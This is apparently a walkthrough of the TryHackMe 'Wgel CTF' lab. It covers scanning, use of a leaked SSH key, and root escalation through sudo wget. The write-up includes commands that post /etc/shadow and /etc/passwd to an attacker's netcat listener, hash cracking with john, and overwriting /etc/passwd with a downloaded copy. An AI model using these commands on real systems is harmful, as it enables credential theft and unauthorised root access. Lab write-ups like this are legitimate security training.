Wgel CTF
Room Link: https://tryhackme.com/room/wgelctf
Scanning
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
On the main page of the site it was just a apache default page but in the source we can see someone named jessie making a comment.
Ran gobuster and found a site under sitemap, nothing really interesting about it when browsing.
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 
gobuster wasn't really able to find anything interesting.
Kali
gobuster dir -u http://$VICTIM/sitemap/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 
Ran dirb with defaults and it found a .ssh folder which has a id_rsa so I downloaded and used it.
Kali
dirb http://$VICTIM/sitemap/
Kali
chmod 600 id_rsa
ssh -v -i id_rsa jessie@$VICTIM
Victim
sudo -l
I tried cracking jessies hash as I would then be able to run any command with sudo but I couldn't crack it, documenting it anyways.
Victim
sudo -u root /usr/bin/wget --post-file=/etc/shadow $KALI:4444
sudo -u root /usr/bin/wget --post-file=/etc/passwd $KALI:4444Victim
nc -lvnp 4444Victim
unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txtInstead I changed the passwd file, I first downloaded to kali and changed the line for jessie so their password is now '123'. Then I uploaded it back and just became root.
Victim
sudo -u root /usr/bin/wget --post-file=/etc/passwd 10.10.65.21:4444Kali
nc -lvnp 4444Line to change
jessie:$1$new$p7ptkEKU1HnaHpRtzNizS1:1000:1000:jessie,,,:/home/jessie:/bin/bash
Kali
python2 -m SimpleHTTPServer 81Victim
sudo wget http://$KALI:8/passwd -O /etc/passwd
sudo -i
Last updated